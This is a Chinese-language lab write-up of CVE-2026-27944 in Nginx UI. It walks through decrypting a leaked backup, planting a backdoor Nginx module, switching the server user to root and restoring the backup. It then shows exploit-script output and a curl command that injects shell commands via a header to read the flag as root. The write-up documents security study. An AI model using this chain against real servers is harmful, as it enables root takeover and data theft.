--- title: "Nginx UI 权限绕过" tags: ["ULab", "Nginx UI", "CVE-2026-27944", "Backup Restore", "无境·U Lab"] difficulty: "Medium" platform: "U Lab" date: 2026-04-02 lastmod: "2026-04-16T12:32:15+08:00" --- ## 靶机信息 - **靶机地址**: - **核心漏洞**: Nginx UI 备份还原功能漏洞 (CVE-2026-27944) --- ## 漏洞利用过程 本靶机的核心思路是通过提取出 Nginx UI 的 AES 密钥,将官方备份下载并解密后,修改内部的配置文件以**植入恶意的自定义 Nginx 模块** (`ngx_http_cre_module.so`),最后重新加密打包并触发系统的恢复还原(Restore)功能,从而获得控制权或文件访问跨越。 ### 1. 下载并解密备份文件 首先,使用漏洞利用脚本提取并解密 Nginx UI 的备份包文件,可以看到脚本成功解析出 AES-256 的 Key 与 IV,并将配置信息全部解压到 `backup_extracted` 目录下。 ### 2. 构造恶意模块并植入配置文件 这步主要是把后门及提权所需的 Nginx 路由加载进系统配置内。 1. **投放 SO 动态库**: 将编译好的后门模块 `ngx_http_cre_module.so` 放置到解压目录: `backup_extracted\nginx\ngx_http_cre_module.so` 2. **全局加载模块**: 修改 `backup_extracted\nginx\nginx.conf`,在首行增加模块加载机制: ```nginx load_module ngx_http_cre_module.so; ``` 3. **修改nginx运行权限** 修改 `nginx.conf`,将用户从 `nginx` 修改为 `root` 以提升运行权限: ```nginx user root; ``` 原配置中的 `user nginx;` 已被移除,确保 Nginx 主进程以最高权限运行,从而允许加载自定义模块并访问受限资源。 ### 3. 重新打包加密备份 接着,必须按照原加密规则将修改过的目录重新压缩加密: 生成了携带我们后门模块和恶意路由规则的还原镜像 `new.zip`。 ### 4. 发起还原请求触发执行 最后,调用系统的 API 还原端点触发该恶意备份包: 至此,通过利用恢复接口覆盖掉 Nginx 配置并重载。带有命令执行等特性的 `ngx_http_cre_module.so` 模块就会在 Nginx 进程重新挂载时被成功加载。 ## 演示 ```txt >python .\CVE-2026-27944.py --target http://ulab.bdziyi.cn:20894/ [1/5] Downloading encrypted backup... backup saved: backup.bin X-Backup-Security: 5gNbzPDd/XCP3/yU/jXZIF5QMiNX/aSLwV8B/lnYVLo=:u7jZ01vjkLMMLqP+JHAw7w== [2/5] Extracting and decrypting backup... extracted to: F:\Ulab\CVE-2026-27944\backup_extracted [3/5] Copying malicious module... module copied to: F:\Ulab\CVE-2026-27944\backup_extracted\nginx\ngx_http_cre_module.so [4/5] Injecting load_module into nginx.conf... load_module already exists, skipped [4.1/5] Modifying user directive in nginx.conf... user directive was already set to 'root', or 'user nginx;' not found [5/5] Repacking encrypted backup... repacked backup: new.zip [+] Done [+] Use this security_token for restore: 5gNbzPDd/XCP3/yU/jXZIF5QMiNX/aSLwV8B/lnYVLo=:u7jZ01vjkLMMLqP+JHAw7w== [6/6] Uploading repacked backup to http://ulab.bdziyi.cn:20894//api/restore... [*] Target URL: http://ulab.bdziyi.cn:20894/api/restore [*] Backup file: new.zip (42654 bytes) [*] Security token: 5gNbzPDd/XCP3/yU/jXZIF5QMiNX/aSLwV8B/lnYVLo=:u7jZ01vjkLMMLqP+JHAw7w== [*] Restore nginx: True [*] Restore nginx-ui: False [*] Verify hash: False [*] Sending restore request... [+] Response received in 0.30s [+] Status code: 200 [+] Response headers: Content-Type: application/json; charset=utf-8 Request-Id: b6ae5806-452e-4a30-b532-10c4a998559e Date: Fri, 10 Apr 2026 04:57:17 GMT Content-Length: 68 Connection: close [+] Response body (68 bytes): {"nginx_ui_restored":false,"nginx_restored":true,"hash_match":false} [+] Restore request completed successfully! [+] Upload completed successfully! ``` 执行命令 ```txt >curl -X GET "http://ulab.bdziyi.cn:20893" -H "Host: ulab.bdziyi.cn:20893" -H "vtoken: id;ls;cat /flag" --ignore-content-length uid=0(root) gid=0(root) groups=0(root) bin boot command data dev docker-entrypoint.d docker-entrypoint.sh etc flag home init lib lib64 media mnt opt package proc root run sbin srv sys tmp usr var flag{6ecb1f6d-2ed7-445a-9859-455c07d60cbc}无境靶场 CVE-2026-27944 Nginx UI 权限绕过 ``` --- ## 总结与知识点 1. **Nginx UI 备份恢复安全风险**:如果 `X-Backup-Security` 字段可猜测、泄漏或认证不严,攻击者不仅能窃取全站配置还能通过伪造和恢复达成任意控制。 2. **恶意 Nginx 模块注入(SO / Load Module)**:结合备份还原功能写入 `.so` 库和 `nginx.conf` 实现了高级的代码级持久化。 ## 参考链接 - [Nginx UI 权限绕过与备份解密漏洞?可能RCE哦 | CVE-2026-27944 复现&研究](https://mp.weixin.qq.com/s/6tMsGOytCk10Edkeet_2DQ?scene=1) - -